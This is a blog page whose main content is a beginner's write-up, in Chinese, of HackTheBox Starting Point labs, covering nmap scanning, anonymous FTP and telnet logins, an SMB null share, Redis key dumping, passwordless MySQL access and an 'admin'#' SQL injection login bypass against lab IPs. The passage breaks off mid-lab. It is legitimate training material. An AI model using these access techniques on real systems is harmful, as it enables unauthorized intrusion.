           href="/2022/11/07/%E7%83%AD%E8%A1%80%E6%B1%9F%E6%B9%96%E6%B8%B8%E6%88%8F%E5%AE%89%E5%85%A8%E7%AD%91%E5%9F%BA/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="热血江湖游戏安全筑基">热血江湖游戏安全筑基</span>
            <span class="post-date" title="2022-11-07 21:27:59">2022/11/07</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/29/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8BAPK%E4%BF%9D%E6%8A%A4%E7%AD%96%E7%95%A5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APK反破解技术">APK反破解技术</span>
            <span class="post-date" title="2022-09-29 16:55:42">2022/09/29</span>
        </a>
        
        
        <a  class="All 安卓逆向 "
           href="/2022/09/29/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8BXposed%E6%A1%86%E6%9E%B6/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="安卓逆向之Xposed框架">安卓逆向之Xposed框架</span>
            <span class="post-date" title="2022-09-29 14:53:11">2022/09/29</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/29/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8BNDK%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="NDK开发">NDK开发</span>
            <span class="post-date" title="2022-09-29 14:42:34">2022/09/29</span>
        </a>
        
        
        <a  class="All 安卓逆向 "
           href="/2022/09/27/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E5%AE%9E%E6%88%98%E4%BF%AE%E6%94%B9%E8%B5%84%E6%BA%90%E5%8E%BB%E5%B9%BF%E5%91%8A01/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="安卓逆向实战修改资源去广告01">安卓逆向实战修改资源去广告01</span>
            <span class="post-date" title="2022-09-27 19:46:34">2022/09/27</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/26/%E9%80%9A%E8%BF%87%E5%AE%9E%E6%88%98%E5%AD%A6%E4%B9%A0smali%E6%B1%87%E7%BC%96/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="smali与dalvik指令">smali与dalvik指令</span>
            <span class="post-date" title="2022-09-26 15:50:15">2022/09/26</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/23/%E5%9F%BA%E4%BA%8EAndroid%E7%9A%84ARM%E6%B1%87%E7%BC%96/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="基于Android的ARM汇编">基于Android的ARM汇编</span>
            <span class="post-date" title="2022-09-23 15:17:52">2022/09/23</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/21/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8BAPK%E6%89%93%E5%8C%85%E6%B5%81%E7%A8%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="安卓逆向之APK打包流程">安卓逆向之APK打包流程</span>
            <span class="post-date" title="2022-09-21 10:17:44">2022/09/21</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/19/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8B%E5%AE%89%E5%8D%93%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="安卓逆向之安卓开发">安卓逆向之安卓开发</span>
            <span class="post-date" title="2022-09-19 17:18:12">2022/09/19</span>
        </a>
        
        
        <a  class="All 安卓逆向 入门手册 "
           href="/2022/09/16/%E5%AE%89%E5%8D%93%E9%80%86%E5%90%91%E4%B9%8Bjava%E5%9F%BA%E7%A1%80/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="安卓逆向之java基础">安卓逆向之java基础</span>
            <span class="post-date" title="2022-09-16 18:02:04">2022/09/16</span>
        </a>
        
        
        <a  class="All IOT "
           href="/2022/09/01/IOT%E5%88%9D%E6%8E%A2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="iot初探">iot初探</span>
            <span class="post-date" title="2022-09-01 14:51:06">2022/09/01</span>
        </a>
        
        
        <a  class="All 漏洞研究 漏洞相关知识 "
           href="/2022/09/01/win%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="漏洞利用原理">漏洞利用原理</span>
            <span class="post-date" title="2022-09-01 11:16:25">2022/09/01</span>
        </a>
        
        
        <a  class="All 漏洞研究 "
           href="/2022/08/31/CVE-2010-2883%E5%A4%8D%E7%8E%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CVE-2010-2883_Adobe Reader TTF字体SING表栈溢出漏洞复现">CVE-2010-2883_Adobe Reader TTF字体SING表栈溢出漏洞复现</span>
            <span class="post-date" title="2022-08-31 17:35:30">2022/08/31</span>
        </a>
        
        
        <a  class="All "
           href="/2022/08/23/APT_Shamoon/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="关于Shamoon.APT组织的一次完整攻击链分析">关于Shamoon.APT组织的一次完整攻击链分析</span>
            <span class="post-date" title="2022-08-23 10:12:17">2022/08/23</span>
        </a>
        
        
        <a  class="All 应急响应 "
           href="/2022/08/16/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="日志分析">日志分析</span>
            <span class="post-date" title="2022-08-16 17:04:55">2022/08/16</span>
        </a>
        
        
        <a  class="All 应急响应 "
           href="/2022/08/16/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94everything%E6%96%87%E4%BB%B6%E8%BF%87%E6%BB%A4/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="everything文件过滤">everything文件过滤</span>
            <span class="post-date" title="2022-08-16 16:22:03">2022/08/16</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-26（Lazarus） "
           href="/2022/08/12/Lazarus%E4%B8%80%E6%AC%A1%E9%92%88%E5%AF%B9%E8%88%AA%E7%A9%BA%E8%88%AA%E5%A4%A9%E8%A1%8C%E4%B8%9A%E7%9A%84%E6%94%BB%E5%87%BB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Lazarus一次针对航空航天行业的攻击">Lazarus一次针对航空航天行业的攻击</span>
            <span class="post-date" title="2022-08-12 15:02:59">2022/08/12</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-08(蔓灵花) "
           href="/2022/08/11/BITTER%E7%BB%84%E7%BB%87%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%901/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="BITTER组织样本分析1">BITTER组织样本分析1</span>
            <span class="post-date" title="2022-08-11 16:06:21">2022/08/11</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2022/07/19/%E7%88%AC%E8%99%AB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="爬虫">爬虫</span>
            <span class="post-date" title="2022-07-19 16:12:19">2022/07/19</span>
        </a>
        
        
        <a  class="All "
           href="/2022/07/15/Google_Hacking_%E8%B0%B7%E6%AD%8C%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Google_Hacking_谷歌搜索引擎">Google_Hacking_谷歌搜索引擎</span>
            <span class="post-date" title="2022-07-15 09:56:40">2022/07/15</span>
        </a>
        
        
        <a  class="All 恶意代码分析 "
           href="/2022/07/13/2022-7-13-exe/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="个人简历.exe">个人简历.exe</span>
            <span class="post-date" title="2022-07-13 09:12:38">2022/07/13</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2022/07/06/%E5%88%9D%E5%85%A5Yara/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Yara入门">Yara入门</span>
            <span class="post-date" title="2022-07-06 16:14:17">2022/07/06</span>
        </a>
        
        
        <a  class="All 恶意代码分析 蠕虫 "
           href="/2022/06/28/2022-06-25_Scar%E6%84%9F%E6%9F%93%E5%BC%8F%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="2022.06.25_Scar感染式样本分析">2022.06.25_Scar感染式样本分析</span>
            <span class="post-date" title="2022-06-28 09:25:02">2022/06/28</span>
        </a>
        
        
        <a  class="All "
           href="/2022/06/27/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%89%8B%E5%86%8C/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="应急响应手册">应急响应手册</span>
            <span class="post-date" title="2022-06-27 15:20:12">2022/06/27</span>
        </a>
        
        
        <a  class="All 恶意代码分析 "
           href="/2022/03/08/%E5%AE%8F%E7%97%85%E6%AF%92%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="宏病毒基础入门">宏病毒基础入门</span>
            <span class="post-date" title="2022-03-08 09:23:03">2022/03/08</span>
        </a>
        
        
        <a  class="All 恶意代码分析 勒索病毒 "
           href="/2022/03/07/WannaCry%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="WannaCry病毒分析">WannaCry病毒分析</span>
            <span class="post-date" title="2022-03-07 11:40:13">2022/03/07</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2022/03/03/wireshark/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="wireshark">wireshark</span>
            <span class="post-date" title="2022-03-03 12:18:53">2022/03/03</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-23(双尾蝎) "
           href="/2022/02/27/%E5%8F%8C%E5%B0%BE%E8%9D%8E%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-C-23境外双尾蝎组织样本分析">APT-C-23境外双尾蝎组织样本分析</span>
            <span class="post-date" title="2022-02-27 16:00:07">2022/02/27</span>
        </a>
        
        
        <a  class="All 应急响应 "
           href="/2022/02/24/%E8%AE%B0%E5%BD%95%E6%A0%A1%E5%9B%ADMAC%E6%8C%96%E7%9F%BF%E7%97%85%E6%AF%92/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="记录校园MAC挖矿病毒">记录校园MAC挖矿病毒</span>
            <span class="post-date" title="2022-02-24 20:04:18">2022/02/24</span>
        </a>
        
        
        <a  class="All 恶意代码分析 蠕虫 "
           href="/2022/02/24/%E7%86%8A%E7%8C%AB%E7%83%A7%E9%A6%99%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="熊猫烧香分析">熊猫烧香分析</span>
            <span class="post-date" title="2022-02-24 18:09:42">2022/02/24</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/02/20/win%E5%86%85%E6%A0%B8%E4%B8%8E%E9%A9%B1%E5%8A%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="win内核与驱动">win内核与驱动</span>
            <span class="post-date" title="2022-02-20 08:23:51">2022/02/20</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2022/01/28/PE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="PE">PE</span>
            <span class="post-date" title="2022-01-28 21:26:29">2022/01/28</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2021/04/10/unix%E7%8E%AF%E5%A2%83%E9%AB%98%E7%BA%A7%E7%BC%96%E7%A8%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="unix环境高级编程">unix环境高级编程</span>
            <span class="post-date" title="2021-04-10 14:54:25">2021/04/10</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2021/03/29/codeql%E5%88%9D%E5%85%A5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="codeql初入">codeql初入</span>
            <span class="post-date" title="2021-03-29 14:14:01">2021/03/29</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-HackTheBox上分锦囊" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">HackTheBox上分锦囊(一)</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="HackTheBox">HackTheBox</a> > 
            
            <a  data-rel="HackTheBox&lt;---&gt;startpointer">startpointer</a>
            
        </span>
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2023-10-27 10:58:40'>2023-03-08 13:55</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B3%A8%E5%86%8C"><span class="toc-text">注册</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B"><span class="toc-text">开始</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9E%E6%8E%A5vpn"><span class="toc-text">连接vpn</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Meow"><span class="toc-text">Meow</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#nmap%E5%AD%A6%E4%B9%A0"><span class="toc-text">nmap学习</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%BF%AB%E9%80%9F%E6%89%AB%E6%8F%8F%E5%A4%9A%E4%B8%AA%E7%9B%AE%E6%A0%87"><span class="toc-text">快速扫描多个目标</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Nmap%E7%9A%84%E6%89%AB%E6%8F%8F%E5%8F%82%E6%95%B0"><span class="toc-text">Nmap的扫描参数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E9%99%A4%E8%BF%87%E6%9F%90%E4%B8%80%E4%B8%AAip%E5%A4%96%E7%9A%84%E6%89%80%E6%9C%89%E5%AD%90%E7%BD%91%E4%B8%BB%E6%9C%BA"><span class="toc-text">扫描除过某一个ip外的所有子网主机</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Fawn"><span class="toc-text">Fawn</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Dancing"><span class="toc-text">Dancing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Redeemer"><span class="toc-text">Redeemer</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#redis"><span class="toc-text">redis</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AD%A6%E4%B8%80%E4%B8%8Bsql%E6%95%B0%E6%8D%AE%E5%BA%93%E8%AF%AD%E6%B3%95"><span class="toc-text">学一下sql数据库语法</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Appointment"><span class="toc-text">Appointment</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Sequel"><span class="toc-text">Sequel</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#mysql%E8%AF%AD%E5%8F%A5%E9%9C%80%E8%A6%81%E5%AD%A6"><span class="toc-text">mysql语句需要学</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Crocodile"><span class="toc-text">Crocodile</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Responder"><span class="toc-text">Responder</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Preignition"><span class="toc-text">Preignition</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mongod"><span class="toc-text">Mongod</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Three"><span class="toc-text">Three</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-6 i,
    .toc-level-6 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="注册"><a href="#注册" class="headerlink" title="注册"></a>注册</h1><p>百度</p>
<h1 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h1><p>我是零基础web手，sql注入都不会，记录一下学习 边上分边学 哪不会就学哪</p>
<h2 id="连接vpn"><a href="#连接vpn" class="headerlink" title="连接vpn"></a>连接vpn</h2><p>先点击右上角的“connect to HTB”，选择Starting Point机器，选择openvpn的方式连接HTB。</p>
<p>选443端口，因为443端口连接稳定，并下载vpn配置文件</p>
<p>打开虚拟机kali linux，打开终端，使用openvpn连接目标机器，连接完成后请刷新HTB页面，如果页面会显示目标机器的ip，即代表此次连接成功（注意：使用openvpn连接目标时，要切换用户权限为root，在命令前加上sudo即可）。</p>
<h3 id="Meow"><a href="#Meow" class="headerlink" title="Meow"></a>Meow</h3><p>VPN 启动序列输出中“隧道接口”的缩写名称是什么？</p>
<p>在kali linux的终端里使用命令： ifconfig</p>
<pre><code>可以发现有一个网卡命为tun0（eth0表示虚拟机本地网卡，lo网卡是实现本机内部访问的，对应的IP 127.0.0.1是本机回送地址），这个tun网卡即为VPN隧道接口 从图上可以看到tun0网卡对应的ip地址 正是目标机器的ip，tun0中的0表示是第一块用于连接vpn隧道接口的网卡。
</code></pre>
<p>此处的答案为：tun</p>
<p>我们使用什么工具通过 ICMP 回显请求测试与目标的连接？</p>
<p>ICMP（Internet Control Message Protocol）Internet控制报文协议。它是TCP&#x2F;IP协议簇的一个子协议，用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。<br>此处的答案为：ping</p>
<p>用于在目标上查找开放端口的最常用工具的名称是什么?</p>
<p>nmap	</p>
<p>问题是：在扫描过程中，我们在端口 23&#x2F;tcp 上识别出什么服务？<br>使用以下命令扫描目标ip端口开放情况：</p>
<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C1.png"></p>
<p>获得的信息是23&#x2F;tcp端口处于开放状态，对应的服务为telnet服务（tetnet是远程登陆服务的主要方式）。</p>
<h4 id="nmap学习"><a href="#nmap学习" class="headerlink" title="nmap学习"></a>nmap学习</h4><p><a target="_blank" rel="noopener" href="https://crayon-xin.github.io/2018/08/12/nmap%E8%B6%85%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%E6%8C%87%E5%8D%97/">https://crayon-xin.github.io/2018/08/12/nmap%E8%B6%85%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%E6%8C%87%E5%8D%97/</a></p>
<p>Nmap的基本使用</p>
<p>基本快速扫描</p>
<p>Nmap 默认发送一个arp的ping数据包，来探测目标主机在1-10000范围内所开放的端口。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 172.20.10.2(这里扫描的是本机的IP）</span><br></pre></td></tr></table></figure>

<h5 id="快速扫描多个目标"><a href="#快速扫描多个目标" class="headerlink" title="快速扫描多个目标"></a>快速扫描多个目标</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap &lt;target ip1 address&gt; &lt;target ip2 address&gt;</span><br></pre></td></tr></table></figure>

<p>Nmap的探测结果以列表的形式展现，同时分为四个状态：open、closed、filtered（被过滤的）、unfiltered。<br>open：该端口开放；s<br>closed：该端口关闭的；<br>filtered：发出的探测数据包不能到达目标主机的目标端口；<br>unfiltered：该端口可以被访问，但具体不清楚是开放的还是关闭的。</p>
<h5 id="Nmap的扫描参数"><a href="#Nmap的扫描参数" class="headerlink" title="Nmap的扫描参数"></a>Nmap的扫描参数</h5><ul>
<li>-p：扫描指定的端口</li>
<li>-A：使用进攻性扫描综合扫描，包括系统探测，版本探测，脚本探测</li>
<li>-sV：指定让Nmap进行版本侦测</li>
<li>-F:扫描100个最有可能开放的端口</li>
<li>-v：显示冗余信息，扫描时显示细节  显示扫描过程</li>
<li>-iL：从文件中导入目标主机或目标网段</li>
<li>-sn：仅进行主机发现，不进行端口扫描</li>
<li>– exclude：所接的主机或网站不进行扫描</li>
<li>-sL：仅列举指定目标的IP，不进行主机发现</li>
<li>–system-dns：指定使用系统的DNS服务器</li>
<li>–excludefile：导入文件中的主机或网段不进行扫描</li>
<li>-n&#x2F;-R：-n表示不进行DNS解析；-R表示进行DNS解析</li>
<li>-sU：使用UDP扫描的方式确定目标主机的UDP端口状态</li>
<li>-Pn：将所有指定的主机视作已开启，跳过主机发现的过程</li>
<li>-T4：指定扫描过程使用的时间</li>
<li>-sP 进行ping扫描</li>
<li>-sn：扫描做出响应的主机，不做进一步测试（如端口扫描或者操作系统探测）</li>
<li>-sA：发送tcp的ack包进行探测，可以探测主机是否存活</li>
<li>-p-是对全端口进行扫描</li>
</ul>
<p>#有6个级别，等级越高速度越快，也容易被检测和屏蔽，建议使用T4<br>一般扫描命令格式：nmap + 扫描参数 + 目标地址或网段</p>
<h5 id="扫描除过某一个ip外的所有子网主机"><a href="#扫描除过某一个ip外的所有子网主机" class="headerlink" title="扫描除过某一个ip外的所有子网主机"></a>扫描除过某一个ip外的所有子网主机</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.227.1/24 -exclude 192.168.227.1</span><br></pre></td></tr></table></figure>

<p>显示扫描的所有主机的列表<br>nmap -sL 192.168.227.1&#x2F;24</p>
<p>sP ping 扫描<br>nmap 可以利用类似window&#x2F;linux 系统下的ping方式进行扫描</p>
<p>nmap -sP <target ip><br>一般来说 我们会用这个命令去扫描内网的一个ip范围，用来做内网的主机发现。</target></p>
<p>nmap -sP 192.168.227.1-255</p>
<p>PING扫描不同于其它的扫描方式，因为它只用于找出主机是否是存在在网络中的.它不是用来发现是否开放端口的.PING扫描需要ROOT权限，如果用户没有ROOT权限,PING扫描将会使用connect()调用.</p>
<p>22.06.11.05(端口扫描技巧)</p>
<pre><code>实际场景
    在实际环境中，当系统管理员对设备进行管理时，或者渗透人员对设备进行检测时， 并不一定对所有的服务进行操作。极有可能是 对某个或某个范围内的服务进行检测 。
    如果对所有服务进行探测，那就就会出现耗时长、费力不讨好的情况。针对这样的情况，我们很有必要了解如何使用 Nmap 来更加灵活的进行服务探测， 避免 全端口探测 对服务器造成的压力。
端口探测技巧
    对某个端口进行探测 nmap -p80 scanme.nmap.org
    对某几个端口进行探测 nmap -p80,135 scanme.nmap.org
    对某个范围端口进行探测 nmap -p1-100 scanme.nmap.org
    对所有端口进行探测 nmap - p- scanme.nmap.org
    指定协议探测端口 nmap -p T:25,U:53 scanme.nmap.org
    通过协议名来扫描端口 nmap -p smtp scanme.nmap.org
    通过名称范围扫描 nmap -p s* scanme.nmap.org
    扫描注册在nmap中的端口 nmap -p [1-65535] scanme.nmap.org
总结
    1、理解为什么要灵活扫描端口的原因。
    2、掌握nmap端口探测的技巧
</code></pre>
<p>登录上去 telnet 10.129.53.2</p>
<p><img src="/.com//2.png"></p>
<p>登进去了 ls一下看看flag</p>
<h3 id="Fawn"><a href="#Fawn" class="headerlink" title="Fawn"></a>Fawn</h3><p>“<em>默认情况下ftp服务器在FTP服务器开启21号端口监听等待客户发起控制连接。</em> </p>
<p>这边利用nmap 指定参数-sV 即可扫描出FTP的运行版本  -sV 探测打开的端口以确定服务&#x2F;版本信息</p>
<p>当您想在没有帐户的情况下登录FTP时，使用的用户名是什么?</p>
<p><strong>anonymous</strong></p>
<p>使用 FTP 传输文件时，用户需要通过向 FTP 服务器提供凭据来获得文件传输许可。当然某些公共 FTP  服务器可能不需要凭据即可访问其文件，但是无法保证数据传输的安全性，任何未加密公共网络上的数据发送都是非常危险的，所以为了保护传输数据的安全，由  FTP 衍生而出的就是下面的两种协议：FTPS 与 SFTP。<br>        如果想要了解FTPS和FTP和SFTP的区别，可以去看一篇文章《一文详解 FTP、FTPS 与 SFTP 的原理》<br>        重点，FTP有两种登录方式。<br>        ftp 有两种登录方式：匿名登录和授权登录。使用匿名登录时，用户名为：anonymous，密码为：任何合法email 地址；使用授权登录时，用户名为用户在远程系统中的用户帐号，密码为用户在远程系统中的用户密码。<br>参考文献：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Gao068465/article/details/120846856">https://blog.csdn.net/Gao068465/article/details/120846856</a></p>
<p>利用ftp工具通过匿名用户anonymous 连接目标web服务器 进行文件传输</p>
<p>禁用FTP匿名登陆：<br>主配置文件 ：vi &#x2F;etc&#x2F;vsftpd&#x2F;vsftpd.conf<br>anonymous_enable&#x3D;NO  #禁止匿名登录</p>
<p>我们得到的FTP消息“登录成功”的响应代码是什么?  </p>
<p>230</p>
<p>用来下载我们在FTP服务器上找到的文件的命令是什么?</p>
<p>下载文件通常用get和mget这两条命令。</p>
<p>FTP的匿名登录一般有三种：<br> 1、 用户名：anonymous  密码：Email或者为空<br> 2、 用户名：FTP 密码：FTP或者为空<br> 3、 用户名：USER 密码：pass</p>
<p>随便选一个登录 原理不着急</p>
<h3 id="Dancing"><a href="#Dancing" class="headerlink" title="Dancing"></a>Dancing</h3><p><em>SMB端口号是 TCP&#x2F;445</em></p>
<p>我们可以使用SMB工具来“列出”共享内容的“标志”或“开关”是什么?</p>
<p>-L</p>
<p>我们最终可以使用空密码访问的共享的名称是什么?</p>
<p><strong>WorkShares</strong></p>
<p>我们知道在这个ip下面有一个 工作目录的分享，所以我们直接用smbclient 去连接</p>
<p>smbclient &#x2F;&#x2F;10.129.47.146&#x2F;WorkShares</p>
<h3 id="Redeemer"><a href="#Redeemer" class="headerlink" title="Redeemer"></a>Redeemer</h3><h4 id="redis"><a href="#redis" class="headerlink" title="redis"></a>redis</h4><p>Redis是什么类型的数据库 内存数据库</p>
<p>哪个命令行工具被用来与Redis服务器交互？输入你要在终端输入的程序名称，不要有任何参数。</p>
<p>redis-cli</p>
<p>哪个标志用于Redis命令行工具，以指定主机名？-h</p>
<p>一旦连接到Redis服务器，哪条命令用于获取有关Redis服务器的信息和统计数据？ info</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h 10s.129.197.189</span><br><span class="line">info</span><br></pre></td></tr></table></figure>

<p>在Redis中使用哪个命令来选择所需的数据库?  select</p>
<p>在索引为0的数据库中存在多少个键？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select 0</span><br><span class="line">keys * </span><br><span class="line">get flag</span><br></pre></td></tr></table></figure>

<h4 id="学一下sql数据库语法"><a href="#学一下sql数据库语法" class="headerlink" title="学一下sql数据库语法"></a>学一下sql数据库语法</h4><h3 id="Appointment"><a href="#Appointment" class="headerlink" title="Appointment"></a>Appointment</h3><p>最常见的SQL漏洞类型是什么?</p>
<p>sql注入  injection</p>
<p>个人验证信息（PII，personally identifiable information）是有关一个人的任何数据，这些数据能帮助识别这个人，如姓名、指纹或其他生物特征资料、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6%E5%9C%B0%E5%9D%80/2284738">电子邮件地址</a>、电话号码或社会安全号码。</p>
<p>Nmap报告在目标器80端口上运行的服务和版本是什么?</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -P 80 10.129.71.97</span><br></pre></td></tr></table></figure>

<p><img src="/.com//HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A%5C3.png"></p>
<p>web应用术语中文件夹叫什么？</p>
<blockquote>
<p>Web目录web directory是网站的在线列表或目录</p>
</blockquote>
<p>Gobuster是一种用于在web服务器上强制执行目录的工具。我们在Gobuster中使用什么开关来指定我们正在寻找目录，而不是子域?</p>
<p>在MySQL中，哪个字符可以用来注释掉一行的其余部分?</p>
<p>在用户名称输入 admin’# 就sql注入成功</p>
<h3 id="Sequel"><a href="#Sequel" class="headerlink" title="Sequel"></a>Sequel</h3><p>当使用MySQL命令行客户端时，我们需要使用什么开关来指定登录用户名?</p>
<p>-u</p>
<p>哪个用户名允许我们登录这个MariaDB实例而不提供密码?</p>
<p>们可以在查询中使用什么符号来指定我们想要显示表中的所有内容?<br> 由SQL语句基础可知-此处指的是通配符，答案为：*</p>
<p>在SQL中，我们需要用什么符号来结束每个查询?；</p>
<p>这个MySQL实例中有三个数据库在所有MySQL实例中都是通用的。这个主机所特有的第四个名字是什么?</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -u root -h 10.129.25.12</span><br></pre></td></tr></table></figure>

<p>information_schema、mysql、performance_schema这三个库是MySQL的默认库，在目标机上我们还发现了一个名为htb的数据库，我们猜测目标机上的flag大概率在名为htb的数据库中，所以我们选择该库并查看该库中的所有tables（表）:</p>
